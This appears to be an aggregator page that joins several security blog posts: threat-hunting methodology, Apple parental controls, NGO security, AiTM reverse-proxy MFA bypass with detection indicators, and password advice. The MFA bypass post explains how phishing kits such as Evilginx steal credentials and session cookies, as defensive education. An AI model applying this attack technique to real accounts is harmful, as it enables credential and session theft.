At Cisco Talos, we understand that effective cybersecurity isn’t just about responding to incidents — it’s about preventing them from happening in the first place. One of the most powerful ways we do this is through proactive threat hunting. Our Talos Incident Response (Talos IR) team works closely with organizations to not only address existing threats but to anticipate and mitigate potential future risks. A key component of our threat-hunting approach is the Splunk SURGe team’s PEAK Threat Hunting Framework, which enables us to conduct comprehensive and proactive hunts with precision.
What is the PEAK Threat Hunting Framework?
The PEAK Framework (Prepare, Execute, and Act with Knowledge) offers a structured methodology for conducting effective and focused threat hunts. It ensures that every hunt is aligned with an organization’s specific needs and threat landscape. At the core of the PEAK framework are baseline hunts, which lay the foundation for proactive threat detection, alongside advanced techniques such as hypothesis-driven hunts and model-assisted threat hunts (M-ATH), which further enhance threat detection and mitigation.
Baseline hunts: the foundation of proactive threat hunting
Baseline hunts involve establishing a clear understanding of an organization’s normal operating environment in terms of user activity, network traffic and system processes. By documenting and analyzing this baseline, Talos IR can identify anomalous behavior that may signal malicious activity.
While these hunts can be a reactive measure, it’s important to use them proactively to detect threats trying to blend in with regular operations, such as insider threats, advanced persistent threats (APTs) and even novel attack techniques that might otherwise go undetected.
The key steps in baseline hunts are:
Defining Normal Activity: Understanding what “normal” looks like in your environment, using data from system logs, user behavior, and network traffic.
Anomaly Detection: Proactively hunting for deviations from the baseline that could indicate potential threats.
Refining the Baseline: Continuously improving and updating the baseline to account for emerging threats and changes in your infrastructure.
Hypothesis-driven hunts: Testing assumptions about threats
In addition to baseline hunts, Talos IR also uses hypothesis-driven hunts to proactively test assumptions about potential threats. These hunts are guided by specific hypotheses or educated guesses about what attackers might be doing in a given environment. Rather than relying on a static, one-size-fits-all approach without adjustments, hypothesis-driven hunts are dynamic, adapting to the specific questions and emerging threats that arise.
For example, a hypothesis-driven hunt might begin with the assumption that a particular group of users is being targeted by a phishing campaign. The hunt would focus on testing this assumption by looking for evidence of malicious emails, unusual login patterns or attempts to collect or exfiltrate data.
The key steps in hypothesis-driven hunts are:
Forming Hypotheses: Based on threat intelligence and past incidents, teams generate specific hypotheses about possible attack vectors or adversary behaviors.
Testing Hypotheses: Using data sources such as endpoint telemetry, authentication logs or network traffic, the hypothesis is tested to see if evidence supports the theory.
Analyzing Results: If the hypothesis is validated, further investigation is done to understand the full scope of the potential threat.
Model-assisted threat hunts: Leveraging machine learning to find hidden threats
Another powerful tool in Talos IR’s proactive hunting approach is model-assisted threat hunts (M-ATHs). These hunts leverage machine learning and advanced statistical models to sift through vast amounts of data and identify patterns that may indicate hidden threats. M-ATHs allow our team to detect threats that would be difficult to find using traditional methods.
Machine learning models are trained to detect suspicious behavior across different domains — such as user activity, network traffic or system logs — by looking for deviations from typical patterns. Over time, as these models learn from new data and threat intelligence, they improve in their ability to detect emerging threats.
The key steps in M-ATHs are:
Data Collection: Gathering large datasets from multiple sources, including network traffic, endpoint data, authentication logs, and more.
Model Training: Using machine learning algorithms to identify patterns in normal and malicious behavior.
Anomaly Detection: The trained model helps identify new, previously undetected anomalies or potential threats by looking for deviations from established patterns.
Refinement: The model is refined as new data is collected and analyzed, improving its ability to detect subtle threats.
Empowering threat hunts with Talos Threat Intelligence
A crucial element that enriches and empowers every Talos IR threat hunt is Talos Threat Intelligence. By integrating up-to-date, high-fidelity threat intelligence into our hunts, we enhance the accuracy, relevance, and speed of our investigations. Talos Threat Intelligence provides a continuous stream of data on emerging threats, attack trends and adversary tactics, which helps us refine hypotheses, adjust baselines and improve our machine learning models.
This intelligence is not just a complement to our hunting process; it is embedded in every stage. It helps guide our hypothesis-driven hunts, sharpens our baseline detections and feeds into the models we use for anomaly detection. With Talos Threat Intelligence, we ensure that every hunt is aligned with the latest threat landscape, empowering your team with the knowledge needed to stay one step ahead of attackers.
Proactive engagements for IR Retainer customers
For Talos IR Retainer customers, baseline hunts, hypothesis-driven hunts, and model-assisted threat hunts provide a valuable layer of ongoing, proactive support. These hunts help organizations detect and mitigate threats before they escalate into full-blown incidents. Our expert hunters work directly with your teams, ensuring that you stay ahead of evolving threats.
Some key benefits of these proactive engagements include:
Early Detection: Identifying abnormal activities that could signal a breach or malicious action, reducing the risk of an attack spreading.
Continuous Improvement: As we refine the baseline and hunting models, your security posture improves over time, allowing for faster and more accurate threat detection.
Actionable Insights: Proactive hunts deliver actionable intelligence that helps your teams strengthen their defenses, based on the latest threat trends and attack methods.
Why it matters
The cybersecurity landscape is constantly evolving, and traditional defensive methods alone are no longer sufficient. Threat actors are adept at blending malicious activity with normal operations, making it difficult to spot attacks using conventional means. By conducting baseline hunts, hypothesis-driven hunts and model-assisted threat hunts, Talos IR gives your organization the tools it needs to stay ahead of adversaries.
As new evidence is uncovered during a hunt, our team adapts and refines the investigation in real time — evolving the hypothesis, adjusting the scope or pivoting to new areas of focus based on what the data reveals.
If an active threat, adversary or malicious activity is detected during a hunt, Talos IR can dynamically pivot the engagement and escalate the situation to our 24/7 on-call Incident Response team. This ensures rapid response for containment, mitigation and eradication, effectively minimizing the potential impact of the threat.
Our Talos IR team collaborates seamlessly with the hunting team to deliver real-time support in identifying, isolating and neutralizing active threats. This integrated approach ensures your systems remain secure and prevents the threat from escalating further.
At Talos, our goal is to empower your team with the knowledge and tools to detect threats proactively, before they turn into incidents. Through our IR Retainer services, we provide continuous support to help you improve your security posture and stay one step ahead of emerging threats, all while leveraging the full power of Talos Threat Intelligence.
For more information about this service, download our At-a-Glance:
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-05-06 10:06:422025-05-06 10:06:42Proactive threat hunting with Talos IR
Earlier this year, Apple announced a string of new initiatives aimed at creating a safer environment for young kids and teens using the company’s devices. Besides making it easier to set up kids’ accounts, the company plans to give parents the option of sharing their children’s age with app developers so as to be able to control what content they show.
Apple says these updates will be made available to parents and developers later this year. In this post, we break down the pros and cons of the new measures. We also touch on what Instagram, Facebook (and the rest of Meta) have to do with it, and discuss how the tech giants are trying to pass the buck on young users’ mental health.
Before the updates: how Apple protects kids right now
Before we talk about Apple’s future innovations, let’s quickly review the parental control status quo on Apple devices. The company introduced its first parental controls way back in June 2009 with the release of the iPhone 3.0, and has been developing them bit by bit ever since.
As things stand, users under 13 must have a special Child Account. These accounts allow parents to access the parental control features built into Apple’s operating systems. Teenagers can continue using a Child Account until the age of 18, as their parents see fit.
What Apple’s Child Account management center currently looks like. Source
Now for the new stuff…
The company has announced a series of changes to its Child Account system related to how parental status is verified. Additionally, it’ll soon be possible to edit a child’s age if it was entered incorrectly. Previously, for accounts of users under 13, it wasn’t even an option: Apple suggested waiting “for the account to naturally age up”. In borderline cases (accounts of kids just under 13), you could try a workaround involving changing the birth date — but such tricks won’t be needed for much longer.
But perhaps the most significant innovation relates to simplifying the creation of these Child Accounts. Henceforth, if parents don’t set up a device before their under-13-year-old starts using it, the child can do it themselves. In this case, Apple will automatically apply age-appropriate web content filters and only allow pre-installed apps, such as Notes, Pages, and Keynote.
Upon visiting the App Store for the first time to download an app, the child will be prompted to ask a parent to complete the setup. On the other hand, until parental consent is given, neither app developers nor Apple itself can collect data on the child.
At this point, even the least tech-savvy parent might ask the logical question: what if my child enters the wrong age during setup? Say, not 10, but 18. Won’t the deepest, darkest corners of the internet be opened up to them?
How Apple intends to solve the age verification issue
The single most substantial of Apple’s new initiatives announced in early 2025 attempts to address the problem of online age verification. The company proposes the following solution: parents will be able to select an age category and authorize sharing this information with app developers during installation or registration.
This way, instead of relying on young users to enter their date-of-birth honestly, developers will be able to use the new Declared Age Range API. In theory, app creators will also be able to use age information to steer their recommendation algorithms away from inappropriate content.
Through the API, developers will only know a child’s age category — not their exact date of birth. Apple has also stated that parents will be able to revoke permission to share age information at any time.
In practice, access to the age category will become yet another permission that young users will be able to give (or, more likely, not give) to apps — just like permissions to access the camera and microphone, or to track user actions across apps.
This is where the main flaw of the proposed solution lies. At present, Apple has given no guarantee that if a user denies permission for age-category access, they won’t be able to use a downloaded app. This decision rests with app developers, as there are no legal consequences for allowing children access to inappropriate content. Moreover, many companies are actively seeking to grow their young audience, since young kids and teens spend a lot of their time online (more on this below).
Finally, let’s mention Apple’s latest innovation: its updating its age-rating system. It will now consist of five categories: 4+, 9+, 13+, 16+, and 18+. In the company’s own words, “This will allow users a more granular understanding of an app’s appropriateness, and developers a more precise way to rate their apps”.
Apple is updating its age rating system — it will comprise five categories. Source
Apple and Meta disagree over who’s responsible for children’s safety online
The problem of verifying a young person’s age online has long been a hot topic. The idea of showing ID every time you want to use an app is, naturally, hardly a crowd-pleaser.
At the same time, taking all users at their word is asking for trouble. After all, even an 11-year-old can figure out how to edit their age in order to register on TikTok, Instagram, or Facebook.
App developers and app stores are all too eager to lay the responsibility for verifying a child’s age at anyone else’s doorstep but their own. Among app developers, Meta is particularly vocal in advocating that age verification is the duty of app stores. And app stores (especially Apple’s) insist that the buck stops with app developers.
Many view Apple’s new initiatives on this matter as a compromise. Meta itself has this to say:
“Parents tell us they want to have the final say over the apps their teens use, and that’s why we support legislation that requires app stores to verify a child’s age and get a parent’s approval before their child downloads an app”.
All very well on paper — but can it be trusted?
Child safety isn’t the priority: why you shouldn’t trust tech giants
Entrusting kids’ online safety to companies that directly profit from the addictive nature of their products doesn’t seem like the best approach. Leaks from Meta, whose statements on Apple’s solution we cited above, have repeatedly shown that the company targets young users deliberately.
For example, in her book Careless People, Sarah Wynne-Williams, former global public policy director at Facebook (now Meta), recounts how in 2017 she learned that the company was inviting advertisers to target teens aged 13 to 17 across all its platforms, including Instagram.
At the time, Facebook was selling the chance to show ads to youngsters at their most psychologically vulnerable — when they felt “worthless”, “insecure”, “stressed”, “defeated”, “anxious”, “stupid”, “useless”, and/or “like a failure”. In practice, this meant, for example, that the company would track when teenage girls deleted selfies to then show them ads for beauty products.
Another leak revealed that Facebook was actively hiring new employees to develop products aimed at kids as young as six, with the goal of expanding its consumer base. It’s all a bit reminiscent of tobacco companies’ best practices back in the 1960s.
Apple has never particularly prioritized kids’ online safety, either. For a long time its parental controls were quite limited, and kids themselves were quick to exploit holes in them.
It wasn’t until 2024 that Apple finally closed a vulnerability allowing kids to bypass controls just by entering a specific nonsensical phrase in the Safari address bar. That was all it took to disable Screen Time controls for Safari — giving kids access to any website. The vulnerability was first reported back in 2021, yet it took three years for the company to react.
Content control: what really helps parents
Child psychology experts agree that unlimited consumption of digital content is bad for children’s psychological and physical health. In his 2024 book The Anxious Generation, US psychologist Jonathan Haidt describes how smartphone and social media use among teenage girls can lead to depression, anxiety, and even self-harm. As for boys, Haidt points to the dangers of overexposure to video games and pornography during their formative years.
Apple may have taken a step in the right direction, but it’ll be for nothing if third-party app developers decide not to play ball. And as the example of Meta illustrates, relying on their honesty and integrity seems premature.
Therefore, despite Apple’s innovations, if you need a helping hand, you’ll find one… at the end of your own arm. If you want to maintain control over what and how much your child consumes online with minimal interference in their life, look no further than our parental control solution.
Kaspersky Safe Kids lets you view reports detailing your child’s activity in apps and online in general. You can use these to customize restrictions and prevent digital addiction by filtering out inappropriate content in search results and, if necessary, blocking specific sites and apps.
What other online threats do kids face, and how to neutralize them? Essential reading:
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-05-05 14:07:522025-05-05 14:07:52Apple beefs up parental controls: what it means for kids | Kaspersky official blog
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-05-03 23:07:032025-05-03 23:07:03RSAC 2025 wrap-up – Week in security with Tony Anscombe
Welcome to this week’s edition of the Threat Source newsletter.
Recently, I was invited to sit on a panel at the CIO4Good Conference here in Washington D.C., where I talked about incident response and cyber preparedness to a room full of CIOs who help lead wonderful missions to help others. I’m incredibly fortunate to be able to volunteer for the NGO community. I’ve been involved with them for a few years now, and it has been a singular experience.
I sit in a uniquely blessed situation. Cisco Talos is resourced to help protect our customers — we have expertise, tooling and a huge array of diverse security skillsets. A humanitarian assistance or non-governmental organization (NGO) usually has none or very few of these luxuries. If I can take some of my time and experience here at Talos and help others who provide housing to the homeless, protect refugees or feed the hungry, damn right I’m gonna do it. And NGOs? They really need help.
In today’s global humanitarian funding climate, money and grants are very scarce to come by. This means the competition for the dollars that remain is fierce, and that things like cybersecurity can fall by the wayside. But security in an NGO is incredibly important. We’re talking about incredibly vulnerable and marginalized people who deserve aid, and the amazing volunteers who should have privacy without malicious interference.
The hard truth is that cybersecurity can be a bleak space. We as professionals do not operate in the “good news” business. We work, and thrive, in adversarial conditions — actively searching for what the bad guys are doing and learning how they are coming after the good guys. They’re launching ransomware. They are extorting and causing real harm to others. This is day in and day out, and it can wear you down mentally. You have to endure and focus on the mission. After all, that’s the gig.
This is why I enjoy volunteering by either giving some of my time and expertise to a mentee or to an NGO that has an outstanding mission to help others. It puts fuel in your soul and reminds you that others are fighting their own good fights. These organizations are some of the best. They have a thankless, often dangerous, mission to help others have better lives. The way I see it, volunteering is the least I could do.
This week is bittersweet because we’re discussing the final section of Talos’ 2024 Year in Review report. Let’s jump into the abyss of AI-based threats together.
Why do I care?
AI may not have upended the threat landscape last year, but it’s setting the stage for 2025, where agentic AI and automated vulnerability discovery could pose serious challenges for defenders. The future may bring:
The use of agentic AI to conduct multi-stage attacks or find creative ways to access restricted systems
Improved personalization and professionalization of social engineering
Automated vulnerability discovery and exploitation
Capabilities to compromise AI models, systems and infrastructure that organizations around the world are building
So now what?
Continue to stay informed and alert, and for more information, read Talos’ blog post about these threats or download the full Year in Review.
Top security headlines of the week
AirPlay Vulnerabilities Expose Apple Devices to Zero-Click Takeover. The identified security defects, 23 in total, could be exploited over wireless networks and peer–to-peer connections, leading to the complete compromise of not only Apple products, but also third-party devices that use the AirPlay SDK. (SecurityWeek)
4 Million Affected by VeriSource Data Breach. VeriSource says the stolen information belonged to employees and dependents of companies using its services. It has been working with its customers to “collect the necessary information to notify additional individuals affected by this incident.” (SecurityWeek)
SAP NetWeaver Visual Composer Flaw Under Active Exploitation. CVE-2025-31324 is a critical vulnerability with a maximum CVSS score of 10 that affects all SAP NetWeaver 7.xx versions. It allows unauthenticated remote attackers to upload arbitrary files to Internet exposed systems without any restrictions. (DarkReading)
FBI shares massive list of 42,000 LabHost phishing domains. The FBI has shared 42,000 phishing domains tied to the LabHost cybercrime platform, one of the largest global phishing-as-a-service (PhaaS) platforms that was dismantled in April 2024. (BleepingComputer)
Can’t get enough Talos?
State-of-the-art phishing: MFA bypass. Cybercriminals are bypassing multi-factor authentication (MFA) using adversary-in-the-middle (AiTM) attacks via reverse proxies, intercepting credentials and authentication cookies.
TTP Episode 11. Craig, Bill and Hazel discuss three of the biggest callouts from Cisco Talos’ latest Incident Response Quarterly Trends.
Talos Takes: Identity and MFA. Hazel and friends discuss how AI isn’t rewriting the cybercrime playbook, but it is turbo charging some of the old tricks, particularly on the social engineering side.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-05-01 18:06:432025-05-01 18:06:43Understanding the challenges of securing an NGO
Cybercriminals are bypassing multi-factor authentication (MFA) using adversary-in-the-middle (AiTM) attacks via reverse proxies, intercepting credentials and authentication cookies.
The developers behind Phishing-as-a-Service (PhaaS) kits like Tycoon 2FA and Evilproxy have added features to make them easier to use and harder to detect.
WebAuthn, a passwordless MFA solution using public key cryptography, prevents password transmission and nullifies server-side authentication databases, offering a robust defense against MFA bypass attacks.
Despite its strong security benefits, WebAuthn has seen slow adoption. Cisco Talos recommends that organizations reassess their current MFA strategies in light of these evolving phishing threats.
For the past thirty years, phishing has been a staple in many cybercriminals’ arsenals. All cybersecurity professionals are familiar with phishing attacks: Criminals impersonate a trusted site in an attempt to social engineer victims into divulging personal or private information such as account usernames and passwords. In the early days of phishing, it was often enough for cybercriminals to create fake landing pages matching the official site, harvest authentication credentials and use them to access victims’ accounts.
Since that time, network defenders have endeavored to prevent these types of attacks using a variety of techniques. Besides implementing strong anti-spam systems to filter phishing emails out of users’ inboxes, many organizations also conduct simulated phishing attacks on their own users to train them to recognize phishing emails. These techniques worked for a time, but as phishing attacks have become more sophisticated and more targeted, spam filters and user training have become less effective.
At the root of this problem is the fact that usernames are often easy to guess or discover, and people are generally very bad at using strong passwords. People also tend to re-use the same weak passwords across many different sites. Cybercriminals, armed with a victim’s username and password, will often attempt credential stuffing attacks, and log into many different sites using the same username/password combination.
To prove that users are valid, authentication systems generally rely on at least one of three authentication methods or factors:
Something you know (ex. a username and password)
Something you have (ex. a smartphone or USB key)
Something you are (ex. your fingerprint or face recognition)
In the presence of increasingly sophisticated phishing messages, using only one authentication factor, such as a username/password, is problematic. Many network defenders have responded by implementing MFA, which includes an additional factor, such as an SMS message or push notification, as an extra step to confirm a user’s identity when logging in. By including an additional factor in the authentication process, compromised usernames and passwords become much less valuable to cybercriminals. However, cybercriminals are a creative bunch, and they have devised a clever way around MFA. Enter the wild world of MFA bypass!
Typically, this is done using a reverse proxy. A reverse proxy functions as an intermediary server, accepting requests from the client before forwarding them on to the actual web servers to which the client wishes to connect.
To bypass MFA the attacker sets up a reverse proxy and sends out phishing messages as normal. When the victim connects to the attacker’s reverse proxy, the attacker forwards the victim’s traffic onwards to the real site. From the perspective of the victim, the site they have connected to looks authentic — and it is! The victim is interacting with the legitimate website. The only difference perceptible to the victim is the location of the site in the web browser’s address bar.
By inserting themselves in the middle of this client-server communication the attacker is able to intercept the username and password as it is sent from the victim to the legitimate site. This completes the first stage of the attack and triggers an MFA request sent back to the victim from the legitimate site. When the expected MFA request is received and approved, an authentication cookie is returned to the victim through the attacker’s proxy server where it is intercepted by the attacker. The attacker now possesses both the victim’s username/password as well as an authentication cookie from the legitimate site.
Figure 1. Flow diagram illustrating MFA bypass using a reverse proxy.
Phishing-as-a-Service (PhaaS) kits
Thanks to turnkey Phishing-as-a-Service (Phaas) toolkits, almost anyone can conduct these types of phishing attacks without knowing much about what is happening under the hood. Toolkits such as Tycoon 2FA, Rockstar 2FA, Evilproxy, Greatness, Mamba 2FA and more have emerged in this space. Over time the developers behind some of these kits have added features to make them easier to use and harder to detect:
Phaas MFA bypass kits typically include templates for the most popular phishing targets to aid cybercriminals in the task of setting up their phishing campaigns.
MFA bypass kits limit access to the phishing links to only users who possess the correct phishing URL and redirect other visitors to benign webpages.
MFA bypass kits often check the IP address and/or User-Agent header of the visitor, preventing access if the IP address corresponds to a known security company/crawler or if the User-Agent indicates that it is a bot. User-Agent filters may also be used to further target the phishing attacks towards users running specific hardware/software.
Reverse proxy MFA bypass kits typically inject their own JavaScript code into the pages they serve to victims to gather additional information about the visitor, and handle redirects after the authentication cookie has been stolen. These scripts are often dynamically obfuscated to prevent static fingerprinting that would allow security vendors to identify the MFA bypass attack sites.
To thwart anti-phishing defenses which may automatically visit URLs contained in an email at the time it is received, there may be a short, programmable delay between when the phishing message is sent and when the phishing lure URL is activated.
Figure 2. An example phishing message associated with the Tycoon 2FA phishing toolkit.
Accelerating the rise in MFA bypass attacks via reverse proxy are publicly available open-source tools, such as Evilginx. Evilginx debuted in 2017 as a modified version of the popular open-source web server nginx. Over time, the application was redesigned and rewritten in Go and implements its own HTTP and DNS server. Although it is marketed as a tool for red teams’ penetration testing needs, because it is open source, anyone can download and modify it.
Fortunately for defenders, there are characteristics common to Evilginx deployments, as well as other AiTM MFA bypass toolkits, that can provide clues an MFA bypass attack may be in progress:
Many MFA bypass reverse proxy servers are hosted on relatively newly registered domains/certificates.
Capturing an authentication cookie only gives attackers access to the victim’s account for that single session. Once they have access to a victim’s account, many attackers add additional MFA devices to the account to maintain persistence. By auditing MFA logs for this kind of activity, defenders may find accounts that have fallen victim to MFA bypass attacks.
By default, Evilginx phishing lure URLs have a URL path consisting of 8 mixed case letters.
By default, Evilginx uses HTTP certificates obtained from LetsEncrypt. Additionally, the certificates it creates by default have an Organization set to “Evilginx Signature Trust Co.”, and a CommonName set to “Evilginx Super-Evil Root CA”.
After a session authentication cookie has been intercepted by the attacker, they will typically load this cookie into their own browser to impersonate the victim. Unless the attacker is careful, for a time, there will be two different users with different User-Agents and IP addresses using the same session cookie. This may be discoverable through web logs or security products that look for things like “impossible travel”.
To avoid the victim clicking a link that redirects them away from the phishing site, the Evilginx reverse proxy rewrites URLs contained in the HTML from the legitimate site. Popular phishing targets may utilize very specific URL paths, and network defenders can look for these URL paths being served from servers other than the legitimate site.
Many MFA bypass reverse proxy implementations are written using Transport Layer Security (TLS) implementations that are native to that programming language. Thus, the TLS fingerprint of the reverse proxy and the legitimate website will be different.
WebAuthn to the rescue?
FIDO (Fast IDentity Online) Alliance and W3C created WebAuthn (Web Authentication API) — a specification that enables MFA based on public key cryptography. WebAuthn is essentially passwordless. When a user registers for MFA using WebAuthn, a cryptographic keypair is generated. The private key is kept on the user’s device, and the corresponding public key is kept on the server.
When a client wants to log in, they indicate this to the server who responds with a challenge. The client then signs this data and returns it to the server. The server can verify the challenge was signed using the user’s private key. No passwords are ever entered into a web form, and no passwords are transmitted over the internet. This also has the side effect of making server-side authentication databases useless to attackers. What good will stealing a public key do?
Figure 3. The WebAuthn authentication process.
As an extra layer of security, WebAuthn credentials are also bound to the website origin where they will be used. For example, suppose a user clicks a link in a phishing message and navigates to an attacker-controlled reverse proxy at mfabypass.com, which is impersonating the user’s bank. The location in the web browser’s address bar will not match the location of the bank to which the credentials are bound, and the WebAuthn MFA authentication process will fail. Binding credentials to a specific origin also eliminates related identity-based attacks such as credential stuffing, where attackers try to reuse the same credentials at multiple sites.
Although the WebAuthn specification was first published back in 2019, it has experienced relatively slow adoption. Based on authentication telemetry data from Cisco Duo for the past six months, it appears that WebAuthn MFA authentications still make up a very low percentage of all MFA authentications.
To a certain degree, this is understandable. Many organizations may have already rolled out other types of MFA and may feel like that is enough protection. However, they may want to rethink their approach as more and more phishing attacks implement MFA bypass strategies.
Coverage
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.
The flow of new information we’re bombarded with never ebbs. In 2025, you get less and less room in your head for things like the password for the email account you set up back in 2020 to sign your mom up for that online marketplace. On World Password Day, which falls on May 1 this year, we suggest putting in a little effort to combat poor memory, weak passwords, and cybercrooks.
As our experts have repeatedly proven, it’s only a matter of time — and money — before someone targeting your password cracks it. Often, it takes very little time and money, too. Our mission is to complicate cracking your password as much as possible, so hackers lose any desire to go after your data.
Our study last year found that intelligent algorithms — whether running on a powerful graphics card like the RTX 4090 or on inexpensive leased cloud hardware — can crack 59% of all passwords in the world in under an hour. We’re in the middle of that study’s phase two, and we’re about to share whether the situation has changed for the better over the year, so subscribe to our blog or Telegram channel to be among the first to know.
Today’s conversation covers more than just the most secure authentication methods and ways to make strong passwords. We’ll discuss techniques for remembering passwords, and answer the question of why using a password manager in 2025 is a really good idea.
How to sign in more securely in 2025
There are several options for signing in to online services and websites today:
Naturally, any of these methods can be compromised (for example, by leaving your hardware token sticking out of the USB port of an unattended computer in a public place), or toughened up (for example, by creating a complex password of more than 20 random characters). And so, as the era of traditional passwords isn’t over just yet, let’s try to figure out how we can improve our current standing by coming up with and memorizing an easy-to-remember password.
How do you remember a complex password?
Before answering this question, let’s recall the basic truths about passwords:
Recommended length: 12–16 characters.
A password should use different types of characters: numbers, lowercase and uppercase letters, and special characters.
A password shouldn’t contain personal information easily traced back to the user.
Got it? Good. Now for the key issue: a complex password is easy to forget; a simple one — easy to crack. To help you achieve a balance between the two, we’ve put together some well-known, but still effective rules for creating easy-to-remember passwords.
Basic level
String together some unrelated words like the ones used in seed phrases when registering crypto wallets. And add a couple of numbers and special characters on the end that are meaningful to you but won’t be easily guessed by an attacker.
Example: DryLandStandGift2015;)
Shorter words are easier to remember, and the number shouldn’t be the year you or a loved one was born. It could be any memorable combination, such as the year you first went to Disneyland, the license plate of your first car, or your wedding date.
Advanced level
Think of a favorite line from a song or a memorable quote from a movie, and then replace, say, every second or third letter with special characters that aren’t in sequential order on the keyboard. Using easily accessible special characters (those you see on your phone’s on-screen keyboard in numeric mode) is handier. This is how you can make a strong password that’s quick to type and makes your life easier.
For example, if you’re a fan of the Harry Potter saga, you may try to use the Avada Kedavra spell for a good cause. Let’s try transforming this killing curse according to the rule above while peppering it generously with capital letters: A!ad@Kd$vr%. At first glance, a password like that looks impossible to remember, but all it takes is a little typing practice. Type it up two or three times, and you’ll see your fingers reaching for the right keys by themselves.
How about entrusting password generation to neural networks?
With the recent surge of ChatGPT and other large language models (LLMs), users have started turning to them for passwords. And it’s easy to see why that would be an appealing option: instead of straining to come up with a strong password, you just ask the AI assistant to generate it — with immediate results. And you can ask to make that password mnemonic if you wish to.
Alas, the danger of using AI as a strong password generator is that it creates combinations of characters that only appear random to the human eye. Passwords generated by AI are not as reliable as they may seem at first glance…
Alexey Antonov, Data Science Team Lead at Kaspersky, who conducted the previous password strength study, has generated a thousand passwords with ChatGPT, Llama, and DeepSeek each. It turned out each model knew that a good password consisted of at least a dozen characters, including both uppercase and lowercase letters, numbers, and special characters. However, DeepSeek and Llama sometimes generated passwords consisting of dictionary words, with some letters replaced with similar-looking numbers or symbols, such as B@n@n@7 or S1mP1eL1on. Amusingly, both models seemed to have a soft spot for the Password password, providing such variations as P@ssw0rd, P@ssw0rd!23, P@ssw0rd1, or P@ssw0rdV.
Needless to say, these are not secure passwords, as intelligent brute-forcing algorithms are well aware of the letter substitution trick. ChatGPT does a better job. Here are some examples of what it came up with:
qLUx@^9Wp#YZ
LU#@^9WpYqxZ
YLU@x#Wp9q^Z
P@zq^XWLY#v9
v#@LqYXW^9pz
These seem to be completely random sets of letters, special characters, and numbers. However, if you look closely, you can easily find some patterns. Some characters, for example, 9, W, p, x, and L, are used more often than others. We compiled a character frequency histogram for all generated passwords, and here’s what we found: ChatGPT’s favorite letters are x and p, Llama loves the character # and is partial to p too, while DeepSeek is hooked on t and w. Meanwhile, a perfectly random number generator would never favor any particular letter over others, but use every character roughly an equal number of times, making the passwords less predictable.
Frequency of character usage by different language models when generating a thousand passwords. Note that almost every password generated by ChatGPT contains the letters x, p, I, and L.
In addition, LLMs, like humans, often neglect to insert special characters or numbers into passwords. A lack of these symbols was found in 26% of passwords generated by ChatGPT, 32% of those generated by Llama, and 29% by DeepSeek.
Awareness of these specifics can help cybercriminals bruteforce AI-generated passwords significantly faster. We ran the entire set of AI-generated passwords through the same algorithm we used for the previous study, only to find a discouraging trend: 88% of passwords generated by DeepSeek, and 87% by Llama, proved insufficiently secure. ChatGPT came out on top — with only 33% of its passwords insecure.
Sadly, LLMs don’t create a truly random distribution, and their output is predictable. Besides, they can easily generate the same password for you as for other users. So what should we do?
Combined approach
We recommend using our Password Checker service or, better yet, Kaspersky Password Manager, to generate passwords. These two use cryptographically secure generators to make passwords that don’t contain detectable patterns, which guarantees true randomness. After generating a strong password, you can then come up with a mnemonic phrase to remember it.
Let’s say the password generator gives you the following combination: HSVpk*VR0Gkq#R
Then, a phrase to help you remember the password might look like this: In a high-speed vehicle (HSV), you go over a peak (pk) and see a star (*) in virtual reality (VR). Then you fall at zero gravity (0G) and see the king and queen (kq) behind the bars (#) in a big tower shaped like a chess rook (R).
Only mnemonics can help with this, so we hope you like abstract and absurd imagery. You can also try drawing the scene that describes your password as shown above. Few would be able to understand the picture besides you. That’s an easy way to memorize one password. But what if there are hundreds of them?
How about storing passwords in a browser?
Not a good idea. To address the issue of remembering passwords, browser developers provide options to generate and save passwords right in the browsers. This is naturally very convenient: the browser itself fills in the password for you whenever needed. Unfortunately, a browser is not password manager, and storing passwords there is extremely insecure.
The problem is, cybercriminals figured out a long time ago how to use simple scripts to pull passwords stored in browsers in mere seconds. And the way browsers sync data across different devices in the cloud — such as through a Google account — is a disservice to users. All it takes is to hack or trick someone into giving up the password for that account, and all their other passwords are an open book.
Use a password manager
A real password manager stores all passwords in an encrypted vault. For example, Kaspersky Password Manager stores all your passwords in a vault encrypted with the AES-256 symmetric encryption algorithm, used by the U.S. National Security Agency to store state secrets. The algorithm uses a master password, which only you know (even we don’t know it) as the encryption key. Each time Kaspersky Password Manager is accessed, the app requests this password from you and decrypts the vault for the current session. In this same encrypted vault you can also store other important information such as bank card numbers, document scans, or notes.
It can be used to generate unique and truly random password combinations.
It can fill in your passwords for you both on computers and mobile devices.
The app is provided for both major mobile platforms as well as macOS and Windows computers; there are also extensions for popular browsers.
The password database is synchronized across all your devices in encrypted form.
You can use it instead of Google Authenticator to generate 2FA codes for all your online accounts.
It checks if your passwords have been leaked or compromised and alerts you if you need to change any of them.
With Kaspersky Password Manager, all you need do is use the methods described above to come up with and remember one master password, which is used to encrypt the password manager vault. Just remember: you’ll have to memorize this password extremely well, because if you lose it you’re back to square one. No one — not even Kaspersky employees — can access your encrypted vault. We don’t know your master password either.
Let’s recap
So how do you properly handle passwords in 2025?
Follow the guidelines above to come up with a secure master password, and use our Password Checker service to test its cryptographic strength.
Can’t think of a strong master password? Create one right there, and use mnemonic rules to memorize it.
Install Kaspersky Password Manager on all your devices. With this app, you only need to remember the master password. The app will remember the rest for you.
